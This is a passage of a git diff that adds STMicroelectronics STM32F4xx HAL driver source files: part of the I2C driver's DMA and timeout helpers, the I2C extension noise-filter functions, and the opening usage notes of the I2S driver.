CurrentMode = hi2c->Mode; + uint32_t CurrentXferOptions = hi2c->XferOptions; + + /* Disable EVT and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Clear Complete callback */ + if (hi2c->hdmatx != NULL) + { + hi2c->hdmatx->XferCpltCallback = NULL; + } + if (hi2c->hdmarx != NULL) + { + hi2c->hdmarx->XferCpltCallback = NULL; + } + + if ((((uint32_t)CurrentState & (uint32_t)HAL_I2C_STATE_BUSY_TX) == (uint32_t)HAL_I2C_STATE_BUSY_TX) || ((((uint32_t)CurrentState & (uint32_t)HAL_I2C_STATE_BUSY_RX) == (uint32_t)HAL_I2C_STATE_BUSY_RX) && (CurrentMode == HAL_I2C_MODE_SLAVE))) + { + /* Disable DMA Request */ + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + hi2c->XferCount = 0U; + + if (CurrentState == HAL_I2C_STATE_BUSY_TX_LISTEN) + { + /* Set state at HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_SLAVE_BUSY_TX; + hi2c->State = HAL_I2C_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveTxCpltCallback(hi2c); +#else + HAL_I2C_SlaveTxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else if (CurrentState == HAL_I2C_STATE_BUSY_RX_LISTEN) + { + /* Set state at HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_SLAVE_BUSY_RX; + hi2c->State = HAL_I2C_STATE_LISTEN; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->SlaveRxCpltCallback(hi2c); +#else + HAL_I2C_SlaveRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + /* Do nothing */ + } + + /* Enable EVT and ERR interrupt to treat end of transfer in IRQ handler */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + } + /* Check current Mode, in case of treatment DMA handler have been preempted by a prior interrupt */ + else if (hi2c->Mode != HAL_I2C_MODE_NONE) + { + if (hi2c->XferCount == (uint16_t)1) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + } + + /* Disable EVT and ERR interrupt */ + __HAL_I2C_DISABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Prepare next transfer or stop current transfer */ + if ((CurrentXferOptions == I2C_NO_OPTION_FRAME) || (CurrentXferOptions == I2C_FIRST_AND_LAST_FRAME) || (CurrentXferOptions == I2C_OTHER_AND_LAST_FRAME) || (CurrentXferOptions == I2C_LAST_FRAME)) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + + /* Disable Last DMA */ + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_LAST); + + /* Disable DMA Request */ + CLEAR_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + hi2c->XferCount = 0U; + + /* Check if Errors has been detected during transfer */ + if (hi2c->ErrorCode != HAL_I2C_ERROR_NONE) + { +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ErrorCallback(hi2c); +#else + HAL_I2C_ErrorCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + hi2c->State = HAL_I2C_STATE_READY; + + if (hi2c->Mode == HAL_I2C_MODE_MEM) + { + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->PreviousState = I2C_STATE_NONE; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MemRxCpltCallback(hi2c); +#else + HAL_I2C_MemRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->PreviousState = I2C_STATE_MASTER_BUSY_RX; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->MasterRxCpltCallback(hi2c); +#else + HAL_I2C_MasterRxCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + } + } + else + { + /* Do nothing */ + } +} + +/** + * @brief DMA I2C communication error callback. + * @param hdma DMA handle + * @retval None + */ +static void I2C_DMAError(DMA_HandleTypeDef *hdma) +{ + I2C_HandleTypeDef *hi2c = (I2C_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* Clear Complete callback */ + if (hi2c->hdmatx != NULL) + { + hi2c->hdmatx->XferCpltCallback = NULL; + } + if (hi2c->hdmarx != NULL) + { + hi2c->hdmarx->XferCpltCallback = NULL; + } + + /* Ignore DMA FIFO error */ + if (HAL_DMA_GetError(hdma) != HAL_DMA_ERROR_FE) + { + /* Disable Acknowledge */ + hi2c->Instance->CR1 &= ~I2C_CR1_ACK; + + hi2c->XferCount = 0U; + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ErrorCallback(hi2c); +#else + HAL_I2C_ErrorCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } +} + +/** + * @brief DMA I2C communication abort callback + * (To be called at end of DMA Abort procedure). + * @param hdma DMA handle. + * @retval None + */ +static void I2C_DMAAbort(DMA_HandleTypeDef *hdma) +{ + __IO uint32_t count = 0U; + I2C_HandleTypeDef *hi2c = (I2C_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; /* Derogation MISRAC2012-Rule-11.5 */ + + /* Declaration of temporary variable to prevent undefined behavior of volatile usage */ + HAL_I2C_StateTypeDef CurrentState = hi2c->State; + + /* During abort treatment, check that there is no pending STOP request */ + /* Wait until STOP flag is reset */ + count = I2C_TIMEOUT_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + if (count == 0U) + { + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + break; + } + count--; + } + while (READ_BIT(hi2c->Instance->CR1, I2C_CR1_STOP) == I2C_CR1_STOP); + + /* Clear Complete callback */ + if (hi2c->hdmatx != NULL) + { + hi2c->hdmatx->XferCpltCallback = NULL; + } + if (hi2c->hdmarx != NULL) + { + hi2c->hdmarx->XferCpltCallback = NULL; + } + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + hi2c->XferCount = 0U; + + /* Reset XferAbortCallback */ + if (hi2c->hdmatx != NULL) + { + hi2c->hdmatx->XferAbortCallback = NULL; + } + if (hi2c->hdmarx != NULL) + { + hi2c->hdmarx->XferAbortCallback = NULL; + } + + /* Disable I2C peripheral to prevent dummy data in buffer */ + __HAL_I2C_DISABLE(hi2c); + + /* Check if come from abort from user */ + if (hi2c->State == HAL_I2C_STATE_ABORT) + { + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->AbortCpltCallback(hi2c); +#else + HAL_I2C_AbortCpltCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } + else + { + if (((uint32_t)CurrentState & (uint32_t)HAL_I2C_STATE_LISTEN) == (uint32_t)HAL_I2C_STATE_LISTEN) + { + /* Renable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* keep HAL_I2C_STATE_LISTEN */ + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_LISTEN; + } + else + { + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + } + + /* Call the corresponding callback to inform upper layer of End of Transfer */ +#if (USE_HAL_I2C_REGISTER_CALLBACKS == 1) + hi2c->ErrorCallback(hi2c); +#else + HAL_I2C_ErrorCallback(hi2c); +#endif /* USE_HAL_I2C_REGISTER_CALLBACKS */ + } +} + +/** + * @brief This function handles I2C Communication Timeout. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param Flag specifies the I2C flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Flag, FlagStatus Status, uint32_t Timeout, uint32_t Tickstart) +{ + /* Wait until flag is set */ + while (__HAL_I2C_GET_FLAG(hi2c, Flag) == Status) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief This function handles I2C Communication Timeout for Master addressing phase. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for I2C module + * @param Flag specifies the I2C flag to check. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnMasterAddressFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Flag, uint32_t Timeout, uint32_t Tickstart) +{ + while (__HAL_I2C_GET_FLAG(hi2c, Flag) == RESET) + { + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_AF) == SET) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Clear AF Flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_AF; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief This function handles I2C Communication Timeout for specific usage of TXE flag. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnTXEFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart) +{ + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_TXE) == RESET) + { + /* Check if a NACK is detected */ + if (I2C_IsAcknowledgeFailed(hi2c) != HAL_OK) + { + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief This function handles I2C Communication Timeout for specific usage of BTF flag. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnBTFFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart) +{ + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == RESET) + { + /* Check if a NACK is detected */ + if (I2C_IsAcknowledgeFailed(hi2c) != HAL_OK) + { + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +/** + * @brief This function handles I2C Communication Timeout for specific usage of STOP flag. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnSTOPFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart) +{ + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_STOPF) == RESET) + { + /* Check if a NACK is detected */ + if (I2C_IsAcknowledgeFailed(hi2c) != HAL_OK) + { + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + return HAL_OK; +} + +/** + * @brief This function handles I2C Communication Timeout for specific usage of STOP request through Interrupt. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnSTOPRequestThroughIT(I2C_HandleTypeDef *hi2c) +{ + __IO uint32_t count = 0U; + + /* Wait until STOP flag is reset */ + count = I2C_TIMEOUT_STOP_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + return HAL_ERROR; + } + } + while (READ_BIT(hi2c->Instance->CR1, I2C_CR1_STOP) == I2C_CR1_STOP); + + return HAL_OK; +} + +/** + * @brief This function handles I2C Communication Timeout for specific usage of RXNE flag. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param Timeout Timeout duration + * @param Tickstart Tick start value + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_WaitOnRXNEFlagUntilTimeout(I2C_HandleTypeDef *hi2c, uint32_t Timeout, uint32_t Tickstart) +{ + + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_RXNE) == RESET) + { + /* Check if a STOPF is detected */ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_STOPF) == SET) + { + /* Clear STOP Flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_STOPF); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + /* Check for the Timeout */ + if (((HAL_GetTick() - Tickstart) > Timeout) || (Timeout == 0U)) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + return HAL_OK; +} + +/** + * @brief This function handles Acknowledge failed detection during an I2C Communication. + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @retval HAL status + */ +static HAL_StatusTypeDef I2C_IsAcknowledgeFailed(I2C_HandleTypeDef *hi2c) +{ + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_AF) == SET) + { + /* Clear NACKF Flag */ + __HAL_I2C_CLEAR_FLAG(hi2c, I2C_FLAG_AF); + + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_AF; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + return HAL_OK; +} + +/** + * @brief Convert I2Cx OTHER_xxx XferOptions to functional XferOptions. + * @param hi2c I2C handle. + * @retval None + */ +static void I2C_ConvertOtherXferOptions(I2C_HandleTypeDef *hi2c) +{ + /* if user set XferOptions to I2C_OTHER_FRAME */ + /* it request implicitly to generate a restart condition */ + /* set XferOptions to I2C_FIRST_FRAME */ + if (hi2c->XferOptions == I2C_OTHER_FRAME) + { + hi2c->XferOptions = I2C_FIRST_FRAME; + } + /* else if user set XferOptions to I2C_OTHER_AND_LAST_FRAME */ + /* it request implicitly to generate a restart condition */ + /* then generate a stop condition at the end of transfer */ + /* set XferOptions to I2C_FIRST_AND_LAST_FRAME */ + else if (hi2c->XferOptions == I2C_OTHER_AND_LAST_FRAME) + { + hi2c->XferOptions = I2C_FIRST_AND_LAST_FRAME; + } + else + { + /* Nothing to do */ + } +} + +/** + * @} + */ + +#endif /* HAL_I2C_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2c_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2c_ex.c new file mode 100644 index 000000000..ed5033200 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2c_ex.c @@ -0,0 +1,184 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_i2c_ex.c + * @author MCD Application Team + * @brief I2C Extension HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of I2C extension peripheral: + * + Extension features functions + * + @verbatim + ============================================================================== + ##### I2C peripheral extension features ##### + ============================================================================== + + [..] Comparing to other previous devices, the I2C interface for STM32F427xx/437xx/ + 429xx/439xx devices contains the following additional features : + + (+) Possibility to disable or enable Analog Noise Filter + (+) Use of a configured Digital Noise Filter + + ##### How to use this driver ##### + ============================================================================== + [..] This driver provides functions to configure Noise Filter + (#) Configure I2C Analog noise filter using the function HAL_I2C_AnalogFilter_Config() + (#) Configure I2C Digital noise filter using the function HAL_I2C_DigitalFilter_Config() + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup I2CEx I2CEx + * @brief I2C HAL module driver + * @{ + */ + +#ifdef HAL_I2C_MODULE_ENABLED + +#if defined(I2C_FLTR_ANOFF)&&defined(I2C_FLTR_DNF) +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup I2CEx_Exported_Functions I2C Exported Functions + * @{ + */ + + +/** @defgroup I2CEx_Exported_Functions_Group1 Extension features functions + * @brief Extension features functions + * +@verbatim + =============================================================================== + ##### Extension features functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure Noise Filters + +@endverbatim + * @{ + */ + +/** + * @brief Configures I2C Analog noise filter. + * @param hi2c pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2Cx peripheral. + * @param AnalogFilter new state of the Analog filter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2CEx_ConfigAnalogFilter(I2C_HandleTypeDef *hi2c, uint32_t AnalogFilter) +{ + /* Check the parameters */ + assert_param(IS_I2C_ALL_INSTANCE(hi2c->Instance)); + assert_param(IS_I2C_ANALOG_FILTER(AnalogFilter)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + hi2c->State = HAL_I2C_STATE_BUSY; + + /* Disable the selected I2C peripheral */ + __HAL_I2C_DISABLE(hi2c); + + /* Reset I2Cx ANOFF bit */ + hi2c->Instance->FLTR &= ~(I2C_FLTR_ANOFF); + + /* Disable the analog filter */ + hi2c->Instance->FLTR |= AnalogFilter; + + __HAL_I2C_ENABLE(hi2c); + + hi2c->State = HAL_I2C_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configures I2C Digital noise filter. + * @param hi2c pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2Cx peripheral. + * @param DigitalFilter Coefficient of digital noise filter between 0x00 and 0x0F. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2CEx_ConfigDigitalFilter(I2C_HandleTypeDef *hi2c, uint32_t DigitalFilter) +{ + uint16_t tmpreg = 0; + + /* Check the parameters */ + assert_param(IS_I2C_ALL_INSTANCE(hi2c->Instance)); + assert_param(IS_I2C_DIGITAL_FILTER(DigitalFilter)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + hi2c->State = HAL_I2C_STATE_BUSY; + + /* Disable the selected I2C peripheral */ + __HAL_I2C_DISABLE(hi2c); + + /* Get the old register value */ + tmpreg = hi2c->Instance->FLTR; + + /* Reset I2Cx DNF bit [3:0] */ + tmpreg &= ~(I2C_FLTR_DNF); + + /* Set I2Cx DNF coefficient */ + tmpreg |= DigitalFilter; + + /* Store the new register value */ + hi2c->Instance->FLTR = tmpreg; + + __HAL_I2C_ENABLE(hi2c); + + hi2c->State = HAL_I2C_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @} + */ + +/** + * @} + */ +#endif + +#endif /* HAL_I2C_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2s.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2s.c new file mode 100644 index 000000000..332b6c2ca --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2s.c @@ -0,0 +1,2095 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_i2s.c + * @author MCD Application Team + * @brief I2S HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Integrated Interchip Sound (I2S) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral State and Errors functions + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + The I2S HAL driver can be used as follow: + + (#) Declare a I2S_HandleTypeDef handle structure. + (#) Initialize the I2S low level resources by implement the HAL_I2S_MspInit() API: + (##) Enable the SPIx interface clock. + (##) I2S pins configuration: + (+++) Enable the clock for the I2S GPIOs. + (+++) Configure these I2S pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_I2S_Transmit_IT() + and HAL_I2S_Receive_IT() APIs). + (+++) Configure the I2Sx interrupt priority. + (+++) Enable the NVIC I2S IRQ handle. + (##) DMA Configuration if you need to use DMA process (HAL_I2S_Transmit_DMA() + and HAL_I2S_Receive_DMA() APIs: + (+++) Declare a DMA handle structure for the Tx/Rx Stream/Channel. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure with the required Tx/Rx parameters. + (+++) Configure the DMA Tx/Rx Stream/Channel. + (+++) Associate the initialized DMA handle to the I2S DMA Tx/Rx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the + DMA Tx/Rx Stream/Channel. + + (#) Program the Mode, Standard, Data Format, MCLK Output, Audio frequency and Polarity + using HAL_I2S_Init() function. + + -@- The specific I2S interrupts (Transmission complete interrupt, + RXNE interrupt and Error Interrupts) will be managed using the macros + __HAL_I2S_ENABLE_IT() and __HAL_I2S_DISABLE_IT() inside the transmit and receive process. + -@- Make sure that either: + (+@) I2S PLL clock is configured or + (+@) External clock source is configured after setting correctly + the define constant EXTERNAL_CLOCK_VALUE in the stm32f4xx_hal_conf.h file. + + (#) Three mode of operations are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send an amount of data in blocking mode using HAL_I2S_Transmit() + (+) Receive an amount of data in blocking mode using HAL_I2S_Receive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send an amount of data in non blocking mode using HAL_I2S_Transmit_IT() + (+) At transmission end of half transfer HAL_I2S_TxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_TxHalfCpltCallback + (+) At transmission end of transfer HAL_I2S_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_TxCpltCallback + (+) Receive an amount of data in non blocking mode using HAL_I2S_Receive_IT() + (+) At reception end of half transfer HAL_I2S_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_RxHalfCpltCallback + (+) At reception end of transfer HAL_I2S_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_RxCpltCallback + (+) In case of transfer Error, HAL_I2S_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2S_ErrorCallback + + *** DMA mode IO operation *** + ============================== + [..] + (+) Send an amount of data in non blocking mode (DMA) using HAL_I2S_Transmit_DMA() + (+) At transmission end of half transfer HAL_I2S_TxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_TxHalfCpltCallback + (+) At transmission end of transfer HAL_I2S_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_TxCpltCallback + (+) Receive an amount of data in non blocking mode (DMA) using HAL_I2S_Receive_DMA() + (+) At reception end of half transfer HAL_I2S_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_RxHalfCpltCallback + (+) At reception end of transfer HAL_I2S_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_RxCpltCallback + (+) In case of transfer Error, HAL_I2S_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2S_ErrorCallback + (+) Pause the DMA Transfer using HAL_I2S_DMAPause() + (+) Resume the DMA Transfer using HAL_I2S_DMAResume() + (+) Stop the DMA Transfer using HAL_I2S_DMAStop() + In Slave mode, if HAL_I2S_DMAStop is used to stop the communication, an error + HAL_I2S_ERROR_BUSY_LINE_RX is raised as the master continue to transmit data. + In this case __HAL_I2S_FLUSH_RX_DR macro must be used to flush the remaining data + inside DR register and avoid using DeInit/Init process for the next transfer. + + *** I2S HAL driver macros list *** + =================================== + [..] + Below the list of most used macros in I2S HAL driver. + + (+) __HAL_I2S_ENABLE: Enable the specified SPI peripheral (in I2S mode) + (+) __HAL_I2S_DISABLE: Disable the specified SPI peripheral (in I2S mode) + (+) __HAL_I2S_ENABLE_IT : Enable the specified I2S interrupts + (+) __HAL_I2S_DISABLE_IT : Disable the specified I2S interrupts + (+) __HAL_I2S_GET_FLAG: Check whether the specified I2S flag is set or not + (+) __HAL_I2S_FLUSH_RX_DR: Read DR Register to Flush RX Data + + [..] + (@) You can refer to the I2S HAL driver header file for more useful macros + + *** I2S HAL driver macros list *** + =================================== + [..] + Callback registration: + + (#) The compilation flag USE_HAL_I2S_REGISTER_CALLBACKS when set to 1U + allows the user to configure dynamically the driver callbacks. + Use Functions HAL_I2S_RegisterCallback() to register an interrupt callback. + + Function HAL_I2S_RegisterCallback() allows to register following callbacks: + (++) TxCpltCallback : I2S Tx Completed callback + (++) RxCpltCallback : I2S Rx Completed callback + (++) TxRxCpltCallback : I2S TxRx Completed callback + (++) TxHalfCpltCallback : I2S Tx Half Completed callback + (++) RxHalfCpltCallback : I2S Rx Half Completed callback + (++) ErrorCallback : I2S Error callback + (++) MspInitCallback : I2S Msp Init callback + (++) MspDeInitCallback : I2S Msp DeInit callback + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + + (#) Use function HAL_I2S_UnRegisterCallback to reset a callback to the default + weak function. + HAL_I2S_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (++) TxCpltCallback : I2S Tx Completed callback + (++) RxCpltCallback : I2S Rx Completed callback + (++) TxRxCpltCallback : I2S TxRx Completed callback + (++) TxHalfCpltCallback : I2S Tx Half Completed callback + (++) RxHalfCpltCallback : I2S Rx Half Completed callback + (++) ErrorCallback : I2S Error callback + (++) MspInitCallback : I2S Msp Init callback + (++) MspDeInitCallback : I2S Msp DeInit callback + + [..] + By default, after the 